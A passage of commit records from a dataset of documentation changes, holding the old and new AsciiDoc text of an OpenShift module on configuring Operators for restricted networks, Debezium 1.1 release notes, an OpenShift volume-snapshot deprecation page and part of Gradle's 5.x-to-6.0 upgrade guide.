image`.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/olm-enabling-operator-restricted-network.adoc","new_file":"modules\/olm-enabling-operator-restricted-network.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * operators\/operator_sdk\/osdk-generating-csvs.adoc\n\n[id=\"olm-enabling-operator-for-restricted-network_{context}\"]\n= Enabling your Operator for restricted network environments\n\nAs an Operator author, your CSV must meet the following additional requirements\nfor your Operator to run properly in a restricted network environment:\n\n* List any _related images_, or other container images that your Operator might\nrequire to perform their functions.\n* Reference all specified images by a digest (SHA) and not by a tag.\n\nYou must use SHA references to related images in two places in the Operator's\nCSV:\n\n* in `spec.relatedImages`:\n+\n[source,yaml]\n----\n...\nspec:\n relatedImages: <1>\n - name: etcd-operator <2>\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n - name: etcd-image\n image: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68\n...\n----\n<1> Create a `relatedImages` section and set the list of related images.\n<2> Specify a 
unique identifier for the image.\n<3> Specify each image by a digest (SHA), not by an image tag.\n\n* in the `env` section of the Operators Deployments when declaring environment\nvariables that inject the image that the Operator should use:\n+\n[source,yaml]\n----\nspec:\n install:\n spec:\n deployments:\n - name: etcd-operator-v3.1.1\n spec:\n replicas: 1\n selector:\n matchLabels:\n name: etcd-operator\n strategy:\n type: Recreate\n template:\n metadata:\n labels:\n name: etcd-operator\n spec:\n containers:\n - args:\n - \/opt\/etcd\/bin\/etcd_operator_run.sh\n env:\n - name: WATCH_NAMESPACE\n valueFrom:\n fieldRef:\n fieldPath: metadata.annotations['olm.targetNamespaces']\n - name: ETCD_OPERATOR_DEFAULT_ETCD_IMAGE <1>\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68 <2>\n - name: ETCD_LOG_LEVEL\n value: INFO\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n imagePullPolicy: IfNotPresent\n livenessProbe:\n httpGet:\n path: \/healthy\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n name: etcd-operator\n readinessProbe:\n httpGet:\n path: \/ready\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n resources: {}\n serviceAccountName: etcd-operator\n strategy: deployment\n----\n<1> Inject the images referenced by the Operator via environment variables.\n<2> Specify each image by a digest (SHA), not by an image tag.\n<3> Also reference the Operator container image by a digest (SHA), not by an image tag.\n\n* Look for the `Disconnected` annotation, which indicates that the Operator works\nin a disconnected environment:\n+\n[source,yaml]\n----\nmetadata:\n annotations:\n operators.openshift.io\/infrastructure-features: '[\"Disconnected\"]'\n----\n+\nOperators can be filtered in OperatorHub by this infrastructure feature.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * operators\/operator_sdk\/osdk-generating-csvs.adoc\n\n[id=\"olm-enabling-operator-for-restricted-network_{context}\"]\n= Enabling your Operator for restricted network environments\n\nAs an Operator author, your CSV must meet the following additional requirements\nfor your Operator to run properly in a restricted network environment:\n\n* List any _related images_, or other container images that your Operator might\nrequire to perform their functions.\n* Reference all specified images by a digest (SHA) and not by a tag.\n\nYou must use SHA references to related images in two places in the Operator's\nCSV:\n\n* in `spec.relatedImages`:\n+\n[source,yaml]\n----\n...\nspec:\n relatedImages: <1>\n - name: etcd-operator <2>\n value: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n - name: etcd-image\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68\n...\n----\n<1> Create a `relatedImages` section and set the list of related images.\n<2> Specify a unique identifier for the image.\n<3> Specify each image by a digest (SHA), not by an image tag.\n\n* in the `env` section of the Operators Deployments when declaring environment\nvariables that inject the image that the Operator should use:\n+\n[source,yaml]\n----\nspec:\n install:\n spec:\n deployments:\n - name: etcd-operator-v3.1.1\n spec:\n replicas: 1\n selector:\n matchLabels:\n name: etcd-operator\n strategy:\n type: Recreate\n template:\n metadata:\n labels:\n name: etcd-operator\n 
spec:\n containers:\n - args:\n - \/opt\/etcd\/bin\/etcd_operator_run.sh\n env:\n - name: WATCH_NAMESPACE\n valueFrom:\n fieldRef:\n fieldPath: metadata.annotations['olm.targetNamespaces']\n - name: ETCD_OPERATOR_DEFAULT_ETCD_IMAGE <1>\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68 <2>\n - name: ETCD_LOG_LEVEL\n value: INFO\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n imagePullPolicy: IfNotPresent\n livenessProbe:\n httpGet:\n path: \/healthy\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n name: etcd-operator\n readinessProbe:\n httpGet:\n path: \/ready\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n resources: {}\n serviceAccountName: etcd-operator\n strategy: deployment\n----\n<1> Inject the images referenced by the Operator via environment variables.\n<2> Specify each image by a digest (SHA), not by an image tag.\n<3> Also reference the Operator container image by a digest (SHA), not by an image tag.\n\n* Look for the `Disconnected` annotation, which indicates that the Operator works\nin a disconnected environment:\n+\n[source,yaml]\n----\nmetadata:\n annotations:\n operators.openshift.io\/infrastructure-features: '[\"Disconnected\"]'\n----\n+\nOperators can be filtered in OperatorHub by this infrastructure feature.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a66f9b750ba087b8c805fc05cdc00ce540654c2","subject":"[release] Changelog for 1.1.0.Beta1","message":"[release] Changelog for 1.1.0.Beta1\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"releases\/1.1\/release-notes.asciidoc","new_file":"releases\/1.1\/release-notes.asciidoc","new_contents":"= Release Notes for Debezium 1.1\n:awestruct-layout: doc\n:awestruct-documentation_version: \"1.1\"\n:toc:\n:toc-placement: macro\n:toclevels: 1\n:sectanchors:\n:linkattrs:\n:icons: font\n\nAll notable changes for Debezium releases are documented in this file.\nRelease numbers follow http:\/\/semver.org[Semantic Versioning].\n\ntoc::[]\n\n[[release-1.1.0-beta1]]\n== *Release 1.1.0.Beta1* _(February 5th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344479[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Beta1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Beta1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Beta1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our docker images then do not forget to pull 
them fresh from Docker registry.\n\n=== Breaking changes\n\nBefore updating the DecoderBufs logical decoding plug-in in your Postgres database to this new version (or when pulling the debezium\/postgres container image for that new version), it is necessary to upgrade the Debezium Postgres connector to 1.0.1.Final or 1.1.0.Alpha2 or later (https:\/\/issues.jboss.org\/browse\/DBZ-1052[DBZ-1052]).\n\nThe `ExtractNewDocumentState` SMT to be used with the Debezium MongoDB connector will now convert `Date` and `Timestamp` fields into the `org.apache.kafka.connect.data.Timestamp` logical type, clarifying its semantics.\nThe schema type itself remains unchanged as `int64`.\nPlease note that the resolution of `Timestamp` is seconds as per the semantics of that type in MongoDB. (https:\/\/issues.jboss.org\/browse\/DBZ-1717[DBZ-1717]).\n\n\n=== New Features\n\n* Create a plug-in for DB2 streaming https:\/\/issues.jboss.org\/browse\/DBZ-695[DBZ-695]\n* Add topic routing by field option for New Record State Extraction https:\/\/issues.jboss.org\/browse\/DBZ-1715[DBZ-1715]\n* Generate date(time) field types in the Kafka Connect data structure https:\/\/issues.jboss.org\/browse\/DBZ-1717[DBZ-1717]\n* Publish TX boundary markers on a TX metadata topic https:\/\/issues.jboss.org\/browse\/DBZ-1052[DBZ-1052]\n* Replace connectorName with kafkaTopicPrefix in kafka key\/value schema https:\/\/issues.jboss.org\/browse\/DBZ-1763[DBZ-1763]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Connector error after adding a new not null column to table in Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1698[DBZ-1698]\n* MySQL connector doesn't use default value of connector.port https:\/\/issues.jboss.org\/browse\/DBZ-1712[DBZ-1712]\n* Fix broken images in Antora and brush up AsciiDoc https:\/\/issues.jboss.org\/browse\/DBZ-1725[DBZ-1725]\n* ANTLR parser cannot parse MariaDB Table DDL with TRANSACTIONAL attribute https:\/\/issues.jboss.org\/browse\/DBZ-1733[DBZ-1733]\n* Postgres connector does not support proxied connections https:\/\/issues.jboss.org\/browse\/DBZ-1738[DBZ-1738]\n* GET DIAGNOSTICS statement not parseable https:\/\/issues.jboss.org\/browse\/DBZ-1740[DBZ-1740]\n* Examples use http access to Maven repos which is no longer available https:\/\/issues.jboss.org\/browse\/DBZ-1741[DBZ-1741]\n* MySql password logged out in debug log level https:\/\/issues.jboss.org\/browse\/DBZ-1748[DBZ-1748]\n* Cannot shutdown PostgreSQL if there is an active Debezium connector https:\/\/issues.jboss.org\/browse\/DBZ-1727[DBZ-1727]\n\n\n=== Other changes\n\nThis release also includes other changes:\n\n* Add tests for using fallback values with default REPLICA IDENTITY https:\/\/issues.jboss.org\/browse\/DBZ-1158[DBZ-1158]\n* Migrate all attribute name\/value pairs to Antora component descriptors https:\/\/issues.jboss.org\/browse\/DBZ-1687[DBZ-1687]\n* Upgrade to Awestruct 0.6.0 https:\/\/issues.jboss.org\/browse\/DBZ-1719[DBZ-1719]\n* Run CI tests for delivered non-connector modules (like Quarkus) https:\/\/issues.jboss.org\/browse\/DBZ-1724[DBZ-1724]\n* Remove overlap of different documentation config files https:\/\/issues.jboss.org\/browse\/DBZ-1729[DBZ-1729]\n* Don't fail upon receiving unknown operation events https:\/\/issues.jboss.org\/browse\/DBZ-1747[DBZ-1747]\n* Provide a method to identify an envelope schema https:\/\/issues.jboss.org\/browse\/DBZ-1751[DBZ-1751]\n* Upgrade to Mongo Java Driver version 3.12.1 https:\/\/issues.jboss.org\/browse\/DBZ-1761[DBZ-1761]\n* Create initial Proposal for DB2 
Source Connector https:\/\/issues.jboss.org\/browse\/DBZ-1509[DBZ-1509]\n* Review Pull Request for DB2 Connector https:\/\/issues.jboss.org\/browse\/DBZ-1527[DBZ-1527]\n* Test Set up of the DB2 Test Instance https:\/\/issues.jboss.org\/browse\/DBZ-1556[DBZ-1556]\n* Create Documentation for the DB2 Connector https:\/\/issues.jboss.org\/browse\/DBZ-1557[DBZ-1557]\n* Verify support of all DB2 types https:\/\/issues.jboss.org\/browse\/DBZ-1708[DBZ-1708]\n\n\n\n[[release-1.1.0-alpha1]]\n== *Release 1.1.0.Alpha1* _(January 16th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344080[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Alpha1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Alpha1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Alpha1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our Docker images, then do not forget to pull them fresh from the Docker registry.\n\n=== Breaking changes\n\nWhen using the outbox event routing SMT and configuring a column from which to obtain the Kafka record timestamp (`table.field.event.timestamp` option), that value could have been exported as milliseconds, microseconds or nanoseconds, based on the source column's definition.\nAs of this release, the timestamp will always be exported as milliseconds (https:\/\/issues.jboss.org\/browse\/DBZ-1707[DBZ-1707]).\n\nThe deprecated Postgres connector option `slot.drop_on_stop` has been removed; use `slot.drop.on.stop` instead (https:\/\/issues.jboss.org\/browse\/DBZ-1600[DBZ-1600]).\n\n\n=== New Features\n\n* MongoDB authentication against non-admin authsource https:\/\/issues.jboss.org\/browse\/DBZ-1168[DBZ-1168]\n* Oracle: Add support for different representations of \"NUMBER\" Data Type https:\/\/issues.jboss.org\/browse\/DBZ-1552[DBZ-1552]\n* Update Mongo Java driver to version 3.12.0 https:\/\/issues.jboss.org\/browse\/DBZ-1690[DBZ-1690]\n* Support exporting change events in \"CloudEvents\" format https:\/\/issues.jboss.org\/browse\/DBZ-1292[DBZ-1292]\n* Build Quarkus extension facilitating implementations of the outbox pattern https:\/\/issues.jboss.org\/browse\/DBZ-1478[DBZ-1478]\n* Support column masking option for Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1685[DBZ-1685]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Make slot creation in PostgreSQL more resilient https:\/\/issues.jboss.org\/browse\/DBZ-1684[DBZ-1684]\n* SQLserver type time(4)...time(7) lost nanoseconds https:\/\/issues.jboss.org\/browse\/DBZ-1688[DBZ-1688]\n* Support boolean as default for INT(1) column in MySQL 
https:\/\/issues.jboss.org\/browse\/DBZ-1689[DBZ-1689]\n* SIGNAL statement is not recognized by DDL parser https:\/\/issues.jboss.org\/browse\/DBZ-1691[DBZ-1691]\n* When using in embedded mode MYSQL connector fails https:\/\/issues.jboss.org\/browse\/DBZ-1693[DBZ-1693]\n* MySQL connector fails to parse trigger DDL https:\/\/issues.jboss.org\/browse\/DBZ-1699[DBZ-1699]\n\n\n=== Other changes\n\nThis release includes also other changes:\n\n* Update outbox routing example https:\/\/issues.jboss.org\/browse\/DBZ-1673[DBZ-1673]\n* Add option to JSON change event SerDe for ignoring unknown properties https:\/\/issues.jboss.org\/browse\/DBZ-1703[DBZ-1703]\n* Update debezium\/awestruct image to use Antora 2.3 alpha 2 https:\/\/issues.jboss.org\/browse\/DBZ-1713[DBZ-1713]\n\n","old_contents":"= Release Notes for Debezium 1.1\n:awestruct-layout: doc\n:awestruct-documentation_version: \"1.1\"\n:toc:\n:toc-placement: macro\n:toclevels: 1\n:sectanchors:\n:linkattrs:\n:icons: font\n\nAll notable changes for Debezium releases are documented in this file.\nRelease numbers follow http:\/\/semver.org[Semantic Versioning].\n\ntoc::[]\n\n[[release-1.1.0-alpha1]]\n== *Release 1.1.0.Alpha1* _(January 16th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344080[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Alpha1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Alpha1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Alpha1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our docker images then do not forget to pull them fresh from Docker registry.\n\n=== Breaking changes\n\nWhen using the outbox event routing SMT and configuring a column from which to obtain the Kafka record timestamp from (table.field.event.timestamp option), then that value could have been exported as milliseconds, microseconds or nanoseconds, based on the source column's definition.\nAs of this release, the timestamp always be exported as milliseconds (https:\/\/issues.jboss.org\/browse\/DBZ-1707[DBZ-1707]).\n\nThe deprecated Postgres connector option `slot.drop_on_stop` has been removed; use `slot.drop.on.stop` instead (https:\/\/issues.jboss.org\/browse\/DBZ-1600[DBZ-1600]).\n\n\n=== New Features\n\n* MongoDB authentication against non-admin authsource https:\/\/issues.jboss.org\/browse\/DBZ-1168[DBZ-1168]\n* Oracle: Add support for different representations of \"NUMBER\" Data Type https:\/\/issues.jboss.org\/browse\/DBZ-1552[DBZ-1552]\n* Update Mongo Java driver to version 3.12.0 https:\/\/issues.jboss.org\/browse\/DBZ-1690[DBZ-1690]\n* Support exporting change 
events in \"CloudEvents\" format https:\/\/issues.jboss.org\/browse\/DBZ-1292[DBZ-1292]\n* Build Quarkus extension facilitating implementations of the outbox pattern https:\/\/issues.jboss.org\/browse\/DBZ-1478[DBZ-1478]\n* Support column masking option for Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1685[DBZ-1685]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Make slot creation in PostgreSQL more resilient https:\/\/issues.jboss.org\/browse\/DBZ-1684[DBZ-1684]\n* SQLserver type time(4)...time(7) lost nanoseconds https:\/\/issues.jboss.org\/browse\/DBZ-1688[DBZ-1688]\n* Support boolean as default for INT(1) column in MySQL https:\/\/issues.jboss.org\/browse\/DBZ-1689[DBZ-1689]\n* SIGNAL statement is not recognized by DDL parser https:\/\/issues.jboss.org\/browse\/DBZ-1691[DBZ-1691]\n* When using in embedded mode MYSQL connector fails https:\/\/issues.jboss.org\/browse\/DBZ-1693[DBZ-1693]\n* MySQL connector fails to parse trigger DDL https:\/\/issues.jboss.org\/browse\/DBZ-1699[DBZ-1699]\n\n\n=== Other changes\n\nThis release includes also other changes:\n\n* Update outbox routing example https:\/\/issues.jboss.org\/browse\/DBZ-1673[DBZ-1673]\n* Add option to JSON change event SerDe for ignoring unknown properties https:\/\/issues.jboss.org\/browse\/DBZ-1703[DBZ-1703]\n* Update debezium\/awestruct image to use Antora 2.3 alpha 2 https:\/\/issues.jboss.org\/browse\/DBZ-1713[DBZ-1713]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59e42ac2cee63fda787609359d00cb109ce5eaa6","subject":"add 4.2 deprecation note - snapshots","message":"add 4.2 deprecation note - snapshots\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"storage\/persistent-storage\/persistent-storage-snapshots.adoc","new_file":"storage\/persistent-storage\/persistent-storage-snapshots.adoc","new_contents":"[id=\"persistent-storage-snapshots\"]\n= Persistent storage using volume snapshots\ninclude::modules\/common-attributes.adoc[]\n:context: persistent-storage-snapshots\n\ntoc::[]\n\n[IMPORTANT]\n====\nVolume snapshot is deprecated in {product-title} 4.2.\n====\n\nThis document describes how to use VolumeSnapshots to protect against data loss in {product-title}. 
Familiarity with xref:..\/..\/storage\/understanding-persistent-storage.adoc#persistent-volumes_understanding-persistent-storage[persistent volumes] is suggested.\n\n:FeatureName: Volume snapshot\n\ninclude::modules\/technology-preview.adoc[leveloffset=+0]\n\ninclude::modules\/persistent-storage-snapshots-about.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-starting-controller-provisioner.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner-aws-gce.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-managing-users.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-creating-deleting.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-create.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-restore.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-delete.adoc[leveloffset=+2]\n","old_contents":"[id=\"persistent-storage-snapshots\"]\n= Persistent storage using volume snapshots\ninclude::modules\/common-attributes.adoc[]\n:context: persistent-storage-snapshots\n\ntoc::[]\n\n\nThis document describes how to use VolumeSnapshots to protect against data loss in {product-title}. Familiarity with xref:..\/..\/storage\/understanding-persistent-storage.adoc#persistent-volumes_understanding-persistent-storage[persistent volumes] is suggested.\n\n:FeatureName: Volume snapshot\n\ninclude::modules\/technology-preview.adoc[leveloffset=+0]\n\ninclude::modules\/persistent-storage-snapshots-about.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-starting-controller-provisioner.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner-aws-gce.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-managing-users.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-creating-deleting.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-create.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-restore.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-delete.adoc[leveloffset=+2]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc59b6e6d87992d1f66becc3c68e32410c77e46b","subject":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","message":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc\n\nCo-Authored-By: Sterling Greene <f8dc2ca1b24f71bd07cf2580bf789fed70c9e45c@users.noreply.github.com>","repos":"blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of 
the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other source sets (e.g. 
`testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache, the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and an ordering issue, both of which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` have been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as the default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during 
unpacking, Gradle would try to remove whatever part of the output had already been unpacked and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful for keeping the build running no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will cause the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\nhttps:\/\/blog.gradle.org\/gradle-metadata-1.0[Gradle Module Metadata], officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means that if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilarly, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused a large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer 